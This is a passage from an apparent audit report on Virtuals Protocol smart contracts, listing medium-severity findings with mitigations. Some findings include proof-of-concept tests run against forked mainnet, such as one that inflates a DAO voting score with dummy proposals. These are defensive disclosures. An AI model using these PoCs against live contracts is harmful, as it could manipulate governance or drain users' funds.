1 passing (1s)Note: in order to run tests, I forked eth mainnet in hardhat network and used mainnet UNISWAP_ROUTER and UNISWAP_FACTORY addresses. I also tweaked .env and hardhat config accordingly.
Run test: npx hardhat test test/bonding.js.
[M-05] Division in Bonding.sol._openTradingOnUniswap() results in an incorrect lpSupply, higher vaultSupply, and dust AgentTokens getting locked in FPair
Submitted by BowTiedOriole, also found by YouCrossTheLineAlfie
When a Prototype Agent graduates to a Sentient Agent, agent tokens are minted to the FPair contract. Users are then able to call Bonding.unwrapToken() to claim their agent tokens.
Upon graduation, the Bonding contract will divide the token supply as well as the tokenBalance by 10 ** 18.
address agentToken = IAgentFactoryV3(agentFactory).executeBondingCurveApplication(
id,
_token.data.supply / (10 ** token_.decimals()),
tokenBalance / (10 ** token_.decimals()),
pairAddress
);Within AgentFactoryV3.executeBondingCurveApplication(), these parameters are used to calculate the vault supply.
bytes memory tokenSupplyParams = abi.encode(
totalSupply,
lpSupply,
/* vaultSupply */ totalSupply - lpSupply,
totalSupply,
totalSupply,
0,
vault
);Then, within AgentToken.initialize(), the provided numbers will be multiplied by 10 ** 18.
uint256 lpSupply = supplyParams.lpSupply * (10 ** decimals());
uint256 vaultSupply = supplyParams.vaultSupply * (10 ** decimals());When lpSupply is calculated as tokenBalance / (10 ** token_.decimals()) it will truncate any remainder after dividing by 1 ether. Then it will be multiplied by 10 ** token_.decimals() which results in a value that is smaller than the original lpSupply. This will result in vaultSupply being too big and AgentTokens being stuck in the FPair contract.
Recommended mitigation steps
Remove the division and then multiplication by 10 ** token_.decimals(). Simply pass through the full wei value.
Proof of Concept
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import {Test, console} from "forge-std/Test.sol";
interface IERC20 {
function transfer(address to, uint256 amount) external returns (bool);
function mint(address to, uint256 amount) external;
function approve(address spender, uint256 amount) external returns (bool);
function balanceOf(address account) external view returns (uint256);
function totalSupply() external view returns (uint256);
}
interface IBonding {
function launch(
string memory _name,
string memory _ticker,
uint8[] memory cores,
string memory desc,
string memory img,
string[4] memory urls,
uint256 purchaseAmount
) external returns (address, address, uint);
function router() external view returns (address);
function buy(uint256 amountIn, address tokenAddress) external payable returns (bool);
}
contract BondingRoundingPOC is Test {
IERC20 virtualToken = IERC20(0x0b3e328455c4059EEb9e3f84b5543F74E24e7E1b);
address bridge = 0x4200000000000000000000000000000000000010;
IBonding bonding = IBonding(0xF66DeA7b3e897cD44A5a231c61B6B4423d613259);
string BASE_RPC_URL = vm.envString("BASE_RPC_URL");
address alice = makeAddr("alice");
address bob = makeAddr("bob");
address charlie = makeAddr("charlie");
uint256 virtualAmount = 45000 ether;
function setUp() public {
uint256 forkId = vm.createFork(BASE_RPC_URL, 29_519_750);
vm.selectFork(forkId);
vm.startPrank(bridge);
virtualToken.mint(alice, virtualAmount);
virtualToken.mint(bob, .5 ether);
vm.stopPrank();
}
function test_rounding_error_upon_graduate() public {
vm.startPrank(alice);
virtualToken.approve(address(bonding), virtualAmount);
string[4] memory urls = ["test", "test", "test", "test"];
uint8[] memory cores = new uint8[](1);
cores[0] = 1;
(address token, address pair, ) = bonding.launch("test agent", "TA", cores, "test", "test", urls, 45000 ether);
vm.stopPrank();
vm.startPrank(bob);
virtualToken.approve(bonding.router(), .5 ether);
bonding.buy(.5 ether, token);
(bool success, bytes memory data) = address(bonding).call(abi.encodeWithSignature("tokenInfo(address)", token));
require(success, "Failed to get token info");
(
,
,
,
address agentToken
) = abi.decode(data, (address, address, address, address));
console.log("agentToken balance of pair :", IERC20(agentToken).balanceOf(pair));
console.log("token balance of alice + bob:", IERC20(token).balanceOf(alice) + IERC20(token).balanceOf(bob));
assertNotEq(IERC20(agentToken).balanceOf(pair), IERC20(token).balanceOf(alice) + IERC20(token).balanceOf(bob));
}
}[M-06] BondingTax has invalid slippage implementation
Submitted by oakcobalt, also found by 0x1982us, adam-idarrha, Damola0x, kodyvim, levi_104, Matin, and slowbugmayor
In BondingTax.sol, swapForAsset will swap taxTokens to assetToken through uniswap router.
The issue is that the slippage calculation (minOutput) is invalid. Currently, mintOutput is a percentage that is based on router.getAmountsOut(amount, path). Since router.getAmountsOut(amount, path) is also dynamic based on the actual uniswapV2pair spot price; this means minOutput will simply be a fraction of the actual swap result. The slippage check will always pass.
function swapForAsset() public onlyBondingRouter returns (bool, uint256) {
...
|> uint256[] memory amountsOut = router.getAmountsOut(amount, path);
require(amountsOut.length > 1, "Failed to fetch token price");
uint256 expectedOutput = amountsOut[1];
uint256 minOutput = (expectedOutput * (10000 - _slippage)) / 10000;
|> try router.swapExactTokensForTokens(amount, minOutput, path, treasury, block.timestamp + 300) returns (
uint256[] memory amounts
) {
emit SwapExecuted(amount, amounts[1]);
return (true, amounts[1]);
} catch {
emit SwapFailed(amount);
return (false, 0);
}Impact
Invalid slippage check allows any swap-out result, causing the treasury to lose the value of collected tax. Note that, even though the base chain has a low risk of front-running attack, the loss due to slippage happens naturally during normal trading activities.
Recommended mitigation steps
Slippage needs to be based on an expected price. Given swapForAsset is only intended to be invoked by BondingRouter, consider implementing a trusted on-chain oracle price reporting and basing the slippage calculation on the on-chain price.
Proof of Concept
Suppose 10000 virtual = 1 WBTC, due to a previous trading, price drops to 10000 virtual = 0.0833 WBTC. 1% slippage based on expected price: 0.099 WBTC.
In swapForAsset:
-
BondingTax calculates
minOutputwith 1% slippageminOutput = 0.0833 WBTC * (10000 - 100) / 10000 = 0.0825 WBTC
-
BondingTax executes swap with these parameters:
-
router.swapExactTokensForTokens(1000 VIRTUAL, // amountIn 0.0825 WBTC, // minOutput (1% less than minOutput) [VIRTUAL, WBTC], // path treasury, // recipient block.timestamp + 300 // deadline )
-
-
The swap executes at the worse price:
- Treasury receives approximately 0.0833 WBTC
<0.099 WBTC.
- Treasury receives approximately 0.0833 WBTC
swapForAsset accepts unbounded slippage.
[M-07] amountOutMin passed in as 0 in AgentToken::_swapTax leads to loss of funds due to slippage
Submitted by YouCrossTheLineAlfie, also found by 0x60scs, adam-idarrha, anchabadze, bytesguard, classic-k, DanielTan, debo, gmh5225, gregom, harsh123, odessos42, Olugbenga, PolarizedLight, slowbugmayor, Topmark, and unique
Finding description
The AgentToken::_swapTax is called via AgentToken::_autoSwap whenever a AgentToken::_transfer call takes place.
On further inspection, it can be observed that _swapTax internally calls uniswap router’s swapExactTokensForTokensSupportingFeeOnTransferTokens function where amountOutMin is passed as 0.
function _swapTax(uint256 swapBalance_, uint256 contractBalance_) internal {
address[] memory path = new address[](2);
path[0] = address(this);
path[1] = pairToken;
// Wrap external calls in try / catch to handle errors
try
_uniswapRouter.swapExactTokensForTokensSupportingFeeOnTransferTokens(
swapBalance_,
0, <<@ -- // amountOutMin is passed as 0
path,
projectTaxRecipient,
block.timestamp + 600
)
{
// . . . Rest of the code . . .
} catch {
// Don't allow a failed external call (in this case to uniswap) to stop a transfer.
// Emit that this has occurred and continue.
emit ExternalCallError(5);
}
}This can lead to unexpectedly high slippage, leading to loss of funds for projectTaxRecipient.
Impact
Loss of funds for the projectTaxRecipient due to high slippage.
Recommended mitigation steps
It is recommended to calculate amountOutMin instead of passing 0:
function swapTax(uint256 swapBalance_, uint256 contractBalance_) internal {
address[] memory path = new address[](2);
path[0] = address(this);
path[1] = pairToken;
+ // Calculate the minimum amount out with slippage tolerance
+ uint256 amountOutMin = calculateMinimumAmountOut(swapBalance_, path);
// Wrap external calls in try / catch to handle errors
try
_uniswapRouter.swapExactTokensForTokensSupportingFeeOnTransferTokens(
swapBalance_,
- 0,
+ amountOutMin,
path,
projectTaxRecipient,
block.timestamp + 600
)
{
// We will not have swapped all tax tokens IF the amount was greater than the max auto swap.
// We therefore cannot just set the pending swap counters to 0. Instead, in this scenario,
// we must reduce them in proportion to the swap amount vs the remaining balance + swap
// amount.
//
// For example:
// * swap Balance is 250
// * contract balance is 385.
// * projectTaxPendingSwap is 300
//
// The new total for the projectTaxPendingSwap is:
// = 300 - ((300 * 250) / 385)
// = 300 - 194
// = 106
if (swapBalance_ < contractBalance_) {
projectTaxPendingSwap -= uint128((projectTaxPendingSwap * swapBalance_) / contractBalance_);
} else {
projectTaxPendingSwap = 0;
}
} catch {
// Don't allow a failed external call (in this case to uniswap) to stop a transfer.
// Emit that this has occurred and continue.
emit ExternalCallError(5);
}
}Below is the calculateMinimumAmountOut implementation:
/**
* @dev Calculates the minimum amount out for a swap to protect against front-running
* @param amountIn The amount of tokens to swap
* @param path The swap path
* @return minAmountOut The minimum amount of tokens to receive
*/
function calculateMinimumAmountOut(uint256 amountIn, address[] memory path) internal view returns (uint256 minAmountOut) {
// Use getAmountsOut to calculate the expected output amount
uint256[] memory amountsOut;
try _uniswapRouter.getAmountsOut(amountIn, path) returns (uint256[] memory amounts) {
amountsOut = amounts;
} catch {
// If getAmountsOut fails, use a fallback method or return 0
return 0; // In case of failure, fallback to 0 to ensure the transaction doesn't revert
}
// If successful, calculate minimum amount with slippage tolerance (e.g., 3%)
if (amountsOut.length > 1) {
uint256 expectedAmountOut = amountsOut[amountsOut.length - 1];
// Apply 3% slippage tolerance: amountOutMin = expectedAmountOut * 0.97
minAmountOut = expectedAmountOut * 97 / 100;
}
return minAmountOut;
}[M-08] Score in AgentDAO is not an accurate measure and can be artificially inflated by spamming proposals
Submitted by BowTiedOriole, also found by kanra and maxzuvex
Finding description and impact
In AgentDAO._castVote(), a user’s score is updated anytime they vote on a proposal. This is a problem because submitting a proposal is permissionless, and the default proposal threshold is 0.
In addition, the user does not even need to hold any veTokens to vote and receive a score.
uint256 weight = super._castVote(proposalId, account, support, reason, params);
if (!votedPreviously && hasVoted(proposalId, account)) {
++_totalScore;
_scores[account].push(SafeCast.toUint48(block.number), SafeCast.toUint208(scoreOf(account)) + 1); // @audit-medium Anybody can create dummy proposal and vote to increase score
if (params.length > 0 && support == 1) {
_updateMaturity(account, proposalId, weight, params);
}
}Recommended mitigation steps
Score should not be used as a trustworthy parameter as long as submitting proposals is permissionless. Additionally, consider adding a check that weight > 0 before increasing a user’s score.
Proof of Concept
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import {Test, console} from "forge-std/Test.sol";
interface IERC20 {
function transfer(address to, uint256 amount) external returns (bool);
function mint(address to, uint256 amount) external;
function approve(address spender, uint256 amount) external returns (bool);
function balanceOf(address account) external view returns (uint256);
}
interface IAgentToken is IERC20 {
function distributeTaxTokens() external;
function projectTaxPendingSwap() external view returns (uint256);
function projectTaxRecipient() external view returns (address);
function setProjectTaxRecipient(address projectTaxRecipient_) external;
function setSwapThresholdBasisPoints(uint16 swapThresholdBasisPoints_) external;
function setProjectTaxRates(
uint16 newProjectBuyTaxBasisPoints_,
uint16 newProjectSellTaxBasisPoints_
) external;
}
interface IAgentDAO {
function propose(
address[] memory targets,
uint256[] memory values,
bytes[] memory calldatas,
string memory description
) external returns (uint256 proposalId);
function castVote(uint256 proposalId, uint8 support) external returns (uint256 balance);
function scoreOf(address account) external view returns (uint256);
}
contract DummyProposalPOC is Test {
IAgentToken agentToken = IAgentToken(0x1C4CcA7C5DB003824208aDDA61Bd749e55F463a3);
IAgentDAO agentDAO = IAgentDAO(0x98cb03B06a91e32c45F4173E290732Dc4a8F41c1);
string BASE_RPC_URL = vm.envString("BASE_RPC_URL");
address user = makeAddr("user");
function setUp() public {
uint256 forkId = vm.createFork(BASE_RPC_URL, 29_225_700);
vm.selectFork(forkId);
}
function test_dummy_proposal_to_increase_score() public {
vm.startPrank(user);
// Setup proposal and propose
address[] memory targets = new address[](1);
targets[0] = address(agentToken);
uint256[] memory values = new uint256[](1);
values[0] = 0;
bytes[] memory calldatas = new bytes[](1);
calldatas[0] = abi.encodeWithSelector(IAgentToken.distributeTaxTokens.selector);
string memory description = "Test Proposal";
uint256 proposalId = agentDAO.propose(targets, values, calldatas, description);
vm.roll(block.number + 1);
assertEq(agentDAO.scoreOf(user), 0);
agentDAO.castVote(proposalId, 1);
assertEq(agentDAO.scoreOf(user), 1);
}
}[M-09] Functions in FERC20 can’t be invoked
Submitted by EPSec, also found by io10, LeoGold, and oakcobalt
Finding Description and Impact
In the FERC20 contract, there are two functions restricted to be called only by the owner of the token: updateMaxTx and excludeFromMaxTx. These functions are crucial for managing transaction limits and exclusions for specific addresses. However, an issue arises as the owner of the token is the Bonding contract, which does not expose these functions externally. As a result, no one can call these functions, preventing the update of transaction limits or exclusions.
Here is the relevant code snippet from the contract:
function updateMaxTx(uint256 _maxTx) public onlyOwner {
_updateMaxTx(_maxTx);
}
function excludeFromMaxTx(address user) public onlyOwner {
require(user != address(0), "ERC20: Exclude Max Tx from the zero address");
isExcludedFromMaxTx[user] = true;
}Impact:
- Transaction Limit Issues: The inability to update the maximum transaction limit leaves the contract inflexible in adapting to changes in market conditions or governance decisions.
- Exclusion Issues: Certain addresses that should be exempt from transaction limits cannot be excluded, limiting the ability to manage token holders effectively.
Recommended mitigation steps
Modify the Bonding contract to include wrapper functions that externally call updateMaxTx and excludeFromMaxTx for the owner. This ensures these functions are accessible for updates and exclusions.
function updateMaxTxForOwner(uint256 _maxTx) public onlyOwner {
token.updateMaxTx(_maxTx);
}
function excludeFromMaxTxForOwner(address user) public onlyOwner {
token.excludeFromMaxTx(user);
}[M-10] Missing totalSupply reduction in burnFrom allows supply manipulation (ERC20 Violation)
Submitted by Agrawain, also found by 0x60scs, bareli, cerweb10, CompetSlayer, DanielTan_MetaTrust, edoscoba, EPSec, Rorschach, Silverwind, unique, and X-Tray03
https://github.com/code-423n4/2025-04-virtuals-protocol/blob/main/contracts/fun/FERC20.sol#L136
Finding description
The burnFrom (address user, uint256 amount) function in the FERC20 contract allows the owner to decrease a user’s balance and emit a Transfer (user, address(0), amount) event — simulating a burn. However, it fails to reduce the _totalSupply variable. This violates the ERC20 standard and creates an inconsistency between on-chain total supply and actual circulating tokens.
Impact
This vulnerability has significant consequences:
- ERC20 Standard Violation: Tools, protocols, and dApps relying on
totalSupply()will receive incorrect data. - Market Cap Manipulation: Since market cap is often calculated as
price * totalSupply, an attacker can make the market cap appear larger than reality, misleading investors and platforms. - DeFi Exploits: Protocols that distribute rewards or voting power proportionally to
totalSupplyorbalance/totalSupplyratios may be gamed. - False Burn Signals: The Transfer event to the zero address signals a burn, while the tokens still exist in the
totalSupply, creating a false narrative of scarcity. - Centralization Risk: The owner can arbitrarily remove user balances (burn) while keeping
totalSupplyunchanged, retaining apparent token value but harming users.
This combination creates both economic manipulation risk and false transparency, which can impact DeFi, governance, analytics, and user trust.
Proof of Concept
// Run Test
npx hardhat test test/exploits/FERC20.js// POC
const { expect } = require("chai");
const { ethers } = require("hardhat");
describe("FERC20", function () {
let token;
let owner;
let addr1;
beforeEach(async function () {
[owner, addr1] = await ethers.getSigners();
const FERC20 = await ethers.getContractFactory("FERC20");
token = await FERC20.deploy("FunToken", "FUN", ethers.parseEther("1000"), 5);
await token.waitForDeployment();
await token.transfer(addr1.address, ethers.parseEther("100"));
});
it("should not reduce totalSupply when using burnFrom (BUG)", async function () {
const initialTotalSupply = await token.totalSupply();
// Burn tokens from addr1
await token.burnFrom(addr1.address, ethers.parseEther("50"));
const finalTotalSupply = await token.totalSupply();
// Esto debería fallar porque totalSupply no cambió
expect(finalTotalSupply).to.be.lt(initialTotalSupply); // <- test para detectar el bug
});
});// output
FERC20
1) should not reduce totalSupply when using burnFrom (BUG)
0 passing (2s)
1 failing
1) FERC20
should not reduce totalSupply when using burnFrom (BUG):
AssertionError: expected 1000000000000000000000000000000000000000 to be below 1000000000000000000000000000000000000000Explanation
This test checks if the burnFrom function correctly reduces the total supply when the owner burns tokens from another user (addr1). In a properly implemented ERC20 token, burning tokens should reduce both the user’s balance and the total supply.
What this means
The test expected finalTotalSupply to be less than initialTotalSupply,
but both values were exactly the same: 1000000000000000000000000000000000000000
The core issue
- Both
initialTotalSupplyandfinalTotalSupplyremain unchanged after burning. - Although
burnFromdecreases the user’s balance and emits a Transfer (user,address(0), amount) event (mimicking a burn), the_totalSupplyis never updated. - This is a major inconsistency that breaks the expected behavior of a burn function and introduces risk.
[M-11] AgentDAO::_castVote doesn’t check the array of votes emitted, which determine the number of battles fought in EloCalculator.sol, allowing the user to increase the ELO of a contribution unfairly, inflating the maturity/impact of ServiceNFTs
Submitted by Jeremias, also found by oakcobalt and Shinobi
Finding description
We have this in their whitepaper:
- When validating a model, validators are presented with two models anonymously for comparison. They go through 10 rounds of interaction with each model pair, selecting the better responses. After 10 rounds, a vote is submitted with the final outcomes.
- Anonymity in model comparison prevents collusion and bias among validators and contributors, ensuring a fair model selection process.
- Virtual Protocol has opted for the Elo Rating System for model comparison.”
Other than the issue of direct on-chain transactions submitted by validators, the elo calculation system of serviceNft isn’t actually capped at 10 rounds, but receives an arbitrary amount of votes that a user directly interacting with the service can determine, both in rounds and value.
This is the AgentDAO override of the _castVote function (to be called by castVoteWithReasonAndParams). It takes params as argument. Which is an encoded uint8[] array representing the result (votes) of those rounds.
function _castVote(
uint256 proposalId,
address account,
uint8 support,
string memory reason,
bytes memory params //@audit params can also be passed as arguments
) internal override returns (uint256) {
.
.
.
if (!votedPreviously && hasVoted(proposalId, account)) {
++_totalScore;
_scores[account].push(SafeCast.toUint48(block.number), SafeCast.toUint208(scoreOf(account)) + 1);
if (params.length > 0 && support == 1) {
@> _updateMaturity(account, proposalId, weight, params); //@audit params is never checked
}
}
.
.
return weight;
}As we saw in agentDAO::_castVote, the params are passed to the agentDAO::_updateMaturity function:
_updateMaturity passes those to _calculateMaturity, to update the “maturity” of the proposal (which should be construed as a relevant measure that weights in the final importance of implementing a new service or not, related to the ELO and weight of vote):
function _updateMaturity(address account, uint256 proposalId, uint256 weight, bytes memory params /*votes*/) internal {
.
.
.
uint8[] memory votes = abi.decode(params, (uint8[])); //@audit params has been decoded, but the length isn't checked
uint256 maturity = _calcMaturity(proposalId, votes); //@audit this calls eloCalculator (shown below)
_proposalMaturities[proposalId] += (maturity * weight); //@audit here maturity is updated, affecting ServiceNfts' elo and impact
emit ValidatorEloRating(proposalId, account, maturity, votes);
}The issue arises in the fact that votes can be any amount of uint8[] votes that the user decided to pass as an argument.
_calcMaturity calls the eloCalculator::battleElo(maturity, votes), where votes will be the uint8[]. We can also know which elo participant is the one we vote for.
function _calcMaturity(uint256 proposalId, uint8[] memory votes) internal view returns (uint256) {
address contributionNft = IAgentNft(_agentNft).getContributionNft();
address serviceNft = IAgentNft(_agentNft).getServiceNft();
uint256 virtualId = IContributionNft(contributionNft).tokenVirtualId(proposalId);
uint8 core = IContributionNft(contributionNft).getCore(proposalId);
uint256 coreService = IServiceNft(serviceNft).getCoreService(virtualId, core);
uint256 maturity = 100;
if (coreService > 0) {
maturity = IServiceNft(serviceNft).getMaturity(coreService);
@> maturity = IEloCalculator(IAgentNft(_agentNft).getEloCalculator()).battleElo(maturity, votes);
//@audit, battleElo is called with an arbitrary amount of uint8[] votes
}
return maturity;
}In eloCalculator::battleElo, the array of votes is used to determine the number of battles that the two elos fight, and the result of the vote determines how the ELO of each of the two participants (models) is affected. Since the ELO is affected by the amount and the result, a user could arbitrarily set both, increasing the ELO of the ServiceNft, and the proposal impact.
The function goes as follows:
function battleElo(uint256 currentRating, uint8[] memory battles) public view returns (uint256) {
uint256 eloA = 1000;
uint256 eloB = 1000;
//@audit battles is the votes params, the length of which we didn't check
for (uint256 i = 0; i < battles.length; i++) {
uint256 result = mapBattleResultToGameResult(battles[i]); //@audit function that maps vote value to result
(uint256 change, bool negative) = Elo.ratingChange(eloB, eloA, result, k);
change = _roundUp(change, 100);
if (negative) {
eloA -= change;
eloB += change;
} else {
eloA += change;
eloB -= change;
}
}
//@audit we can arbitrarily raise the ELO to make our vote more impactful in maturity
return currentRating + eloA - 1000;
}The amount of times the change is affected to the ELO rating, is defined by that unchecked uint8[] array. Thus, allowing users to increase more than due maturity/ELO. The maturity of the proposal would be bigger than it should, and the serviceNft would also get a bigger impact than it should have.
An impact is a value calculated from the serviceNft::maturity[proposalId] (taken from agentDAO::getMaturity(proposalId) at mint call, and stored in the contract’s array), and is the difference of the current service, and the previous service maturity.
function updateImpact(uint256 virtualId, uint256 proposalId) public {
// Calculate impact
// Get current service maturity
uint256 prevServiceId = _coreServices[virtualId][_cores[proposalId]];
uint256 rawImpact = (_maturities[proposalId] > _maturities[prevServiceId])
? _maturities[proposalId] - _maturities[prevServiceId] //@audit raw-impact is the difference of maturities between proposals. An inflated votation might result in an inflated difference.
: 0;
uint256 datasetId = IContributionNft(contributionNft).getDatasetId(proposalId);
_impacts[proposalId] = rawImpact;
if (datasetId > 0) {
.
.
.
}
emit SetServiceScore(proposalId, _maturities[proposalId], _impacts[proposalId]);
}We don’t know what the current implementation of agentReward is, but for version of v2 or lower, it would allow for an inflated reward to contributor.
function _distributeContributorRewards(
uint256 amount,
uint256 virtualId,
RewardSettingsCheckpoints.RewardSettings memory settings
) private {
IAgentNft nft = IAgentNft(agentNft);
uint8[] memory coreTypes = nft.virtualInfo(virtualId).coreTypes;
IServiceNft serviceNftContract = IServiceNft(serviceNft);
IContributionNft contributionNftContract = IContributionNft(contributionNft);
Reward storage reward = _rewards[virtualId][_rewards[virtualId].length - 1];
reward.coreAmount = amount / coreTypes.length;
uint256[] memory services = nft.getAllServices(virtualId);
// Populate service impacts
uint256 serviceId;
uint256 impact;
for (uint i = 0; i < services.length; i++) {
serviceId = services[i];
impact = serviceNftContract.getImpact(serviceId); //@audit <--here impacts are taken from serviceNft
if (impact == 0) {
continue;
}
ServiceReward storage serviceReward = _serviceRewards[serviceId];
if (serviceReward.impact == 0) {
serviceReward.impact = impact;
}
_rewardImpacts[reward.id][serviceNftContract.getCore(serviceId)] += impact; //<-- impacts are rewarded
}Impact
Users, or even contributors can spam it, leaving the ServiceNft of a proposal with an ELO that severely misrepresents what the actual value of the proposal could be, up to the limit differences that they required in elo.sol.
Moreover, since the impact (a param of a serviceNft which represents a value of sorts for the service over the previous implementation) is used to calculate contributor rewards (at least as it is shown in AgentRewardv2.sol and AgentRewardv1.sol), this could also inflate them, giving more rewards than due.
For AgentRewardv3 we’d have to think that either it doesn’t rewards contributions, is partially used, or is unfinished. We don’t really know which one it is.
Recommended mitigation steps
Inside agentDAO::_updateMaturity add a statement after decoding the params to check that the length of the array of votes/battles is 10 (you could also replace it with a variable):
function _updateMaturity(address account, uint256 proposalId, uint256 weight, bytes memory params) internal {
address contributionNft = IAgentNft(_agentNft).getContributionNft();
address owner = IERC721(contributionNft).ownerOf(proposalId);
if (owner == address(0)) {
return;
}
bool isModel = IContributionNft(contributionNft).isModel(proposalId);
if (!isModel) {
return;
}
uint8[] memory votes = abi.decode(params, (uint8[]));
+ if(votes.length() != 10) revert();
uint256 maturity = _calcMaturity(proposalId, votes);
_proposalMaturities[proposalId] += (maturity * weight);
emit ValidatorEloRating(proposalId, account, maturity, votes);
}Proof of Concept
- There’s a proposal for a model update.
- A user or the contributor submits a malicious (or many malicious) vote directly to the chain, with more rounds than the 10 determined in the whitepaper, either for or against the proposal.
- The ELO and the maturity increases (or decreases) more sharply with those votes.
- The resulting
serviceNftwould have really incorrect information. - The resulting maturity of the
serviceNftcould end up with an impact of 0 (or a low value) and leave contributor without (or with reduced) rewards, or it could get inflated (and give more rewards than it is fair).
[M-12] No slippage protection during adding liquidity to uniswap
Submitted by EPSec, also found by BestBugBusters, chupinexx, felconsec, gmh5225, Olugbenga, PotEater, pro_king, unique, and wahedtalash77
Finding description and impact
In the _executeApplication in AgentFactoryV4, during the process of adding liquidity using Uniswap’s IUniswapV2Router02.addLiquidity method, slippage tolerance is set to 0 for both token and assetToken. Specifically, in the following line:
IUniswapV2Router02(_uniswapRouter).addLiquidity(
token,
assetToken,
IERC20(token).balanceOf(address(this)),
initialAmount,
0, // slippage tolerance for token
0, // slippage tolerance for assetToken
address(this),
block.timestamp
);Here, the 0 values for slippage tolerance mean that the liquidity addition will fail if the price of either token or assetToken fluctuates even slightly between when the transaction is initiated and when it’s executed. This is because Uniswap requires that the amount of tokens being swapped remains within a certain tolerance range to prevent slippage.
Recommended mitigation steps
To mitigate this issue, the following steps are recommended:
Introduce slippage protection: Modify the addLiquidity call to include a non-zero slippage tolerance. This ensures that the liquidity addition will proceed within a reasonable range of price variation.
uint256 slippageTolerance = 50; // 0.5% slippage tolerance (adjustable)
uint256 tokenAmountMin = (IERC20(token).balanceOf(address(this)) * (100 - slippageTolerance)) / 100;
uint256 assetAmountMin = (initialAmount * (100 - slippageTolerance)) / 100;
IUniswapV2Router02(_uniswapRouter).addLiquidity(
token,
assetToken,
IERC20(token).balanceOf(address(this)),
initialAmount,
tokenAmountMin,
assetAmountMin,
address(this),
block.timestamp
);slippageTolerance: The percentage tolerance for slippage. This should be adjusted based on the application’s tolerance for price fluctuation (e.g., 0.5% or 1%).tokenAmountMinandassetAmountMin: These variables calculate the minimum acceptable amounts oftokenandassetTokenthat will be added to the liquidity pool, accounting for slippage.
[M-13] Removal of a liquidity pool on AgentToken::removeLiquidityPool still incurs taxes on swaps
Submitted by YouCrossTheLineAlfie
Finding description
The AgentToken.sol contract uses tax mechanism whenever swaps take place for the added liquidity pools, which can be observed in the transfer functions.
function transfer(address to, uint256 amount) public virtual override(IERC20) returns (bool) {
address owner = _msgSender();
_transfer(owner, to, amount, (isLiquidityPool(owner) || isLiquidityPool(to))); << @ - // if `isLiquidityPool` returns true, then taxes are levied.
return true;
}The liquidity pools are added via AgentToken::addLiquidityPool and during the AgentToken::_createPair call, which takes place during initialize.
function _createPair() internal returns (address uniswapV2Pair_) {
uniswapV2Pair_ = IUniswapV2Factory(_uniswapRouter.factory()).getPair(address(this), pairToken);
if (uniswapV2Pair_ == address(0)) {
uniswapV2Pair_ = IUniswapV2Factory(_uniswapRouter.factory()).createPair(address(this), pairToken);
emit LiquidityPoolCreated(uniswapV2Pair_);
}
_liquidityPools.add(uniswapV2Pair_); <<@ -- // Here the `uniswapV2Pair_` gets rightfully added
return (uniswapV2Pair_);
}Similarly, these liquidity pools are removed via AgentToken::removeLiquidityPool
function removeLiquidityPool(address removedLiquidityPool_) external onlyOwnerOrFactory {
// Remove this from the enumerated list:
_liquidityPools.remove(removedLiquidityPool_); <<@
emit LiquidityPoolRemoved(removedLiquidityPool_);
}However, the issue lies with the way AgentToken::isLiquidityPool has been implemented.
function isLiquidityPool(address queryAddress_) public view returns (bool) {
/** @dev We check the uniswapV2Pair address first as this is an immutable variable and therefore does not need
* to be fetched from storage, saving gas if this address IS the uniswapV2Pool. We also add this address
* to the enumerated set for ease of reference (for example it is returned in the getter), and it does
* not add gas to any other calls, that still complete in 0(1) time.
*/
return (queryAddress_ == uniswapV2Pair || _liquidityPools.contains(queryAddress_)); << @ - // Returns true even if `uniswapV2Pair` is removed.
}As we can observe, even if the uniswapV2Pair is removed from the _liquidityPools via AgentToken::removeLiquidityPool call, the AgentToken::isLiquidityPool would still return true, which is incorrect and hence, would cause taxes upon swaps leading to unwanted loss of funds for the users.
Impact
Broken AgentToken::isLiquidityPool leads to excessive taxes for swaps to users, leading to loss of funds.
Recommended mitigation steps
It is recommended to set uniswapV2Pair to a dead/zero address to avoid isLiquidityPool returning true.
function removeLiquidityPool(address removedLiquidityPool_) external onlyOwnerOrFactory {
// Remove this from the enumerated list:
_liquidityPools.remove(removedLiquidityPool_);
+ if(removedLiquidityPool_ == uniswapV2Pair){
+ uniswapV2Pair = address(0);
+ }
emit LiquidityPoolRemoved(removedLiquidityPool_);
}Proof of Concept
The test case below was ran using a base mainnet fork, please add the same to the hardhat.config.js file. The hardhat version wasn’t supporting the base mainnet fork, so it had to be upgraded:
"hardhat": "^2.23.0",Add the following values to the .env file (along with private keys):
### Genesis DAO settings
GENESIS_VOTING_DELAY=0
GENESIS_VOTING_PERIOD=900
GENESIS_PROPOSAL_THRESHOLD=0
### Virtual DAO settings
PROTOCOL_VOTING_DELAY=0
PROTOCOL_VOTING_PERIOD=900
PROTOCOL_PROPOSAL_THRESHOLD=1000000000000000000000000
PROTOCOL_QUORUM_NUMERATOR=1000
### Other settings
CHAIN_ID=84532
VIRTUAL_APPLICATION_THRESHOLD=50000000000000000000 # 50
VIRTUAL_APPLICATION_THRESHOLD_VIP=125000000000000000000 #125 $V
MATURITY_DURATION=1000 # number of blocks until initial virtual staker can withdraw (1000 blocks = ~33 minutes)
### AgentToken settings
AGENT_TOKEN_SUPPLY=1000000000 # 1B supply
AGENT_TOKEN_LIMIT_TRX=100000 # 100k max token per txn
AGENT_TOKEN_LIMIT_WALLET=1000000 # 1M token per wallet
AGENT_TOKEN_LP_SUPPLY=1000000000 # 1B LP tokens
AGENT_TOKEN_LIMIT=1000000000
AGENT_TOKEN_VAULT_SUPPLY=0 #
BOT_PROTECTION=3600 # 1hr
TAX=100 # 3%
BONDING_TAX=1
SWAP_THRESHOLD=1 # 0.00001% of total supply
### VOTING_TOKEN=
TBA_REGISTRY=
### Reward settings
PARENT_SHARES=2000 # 20%
PROTOCOL_SHARES=1000 # 10%
CONTRIBUTOR_SHARES=5000 # 50%
STAKER_SHARES=9000 # 90%
REWARD_STAKE_THRESHOLD=2000000000000000000 # 2 eth
DATASET_SHARES=7000 # 70%
### TAX MANAGER
MIN_SWAP_THRESHOLD=100000000000000000 # 0.1
MAX_SWAP_THRESHOLD=1000000000000000000000 # 1000
UNISWAP_ROUTER=0x4752ba5dbc23f44d87826276bf6fd6b1c372ad24Create a file called PoC.js and add the following test case inside the /tests folder and run npx hardhat test --grep "Removed liquidity pair still accrues taxes":
const { parseEther, toBeHex, formatEther } = require("ethers/utils");
const { expect } = require("chai");
const {
loadFixture,
mine,
impersonateAccount,
setBalance,
} = require("@nomicfoundation/hardhat-toolbox/network-helpers");
const { ethers } = require("hardhat");
describe("AgentFactory", () => {
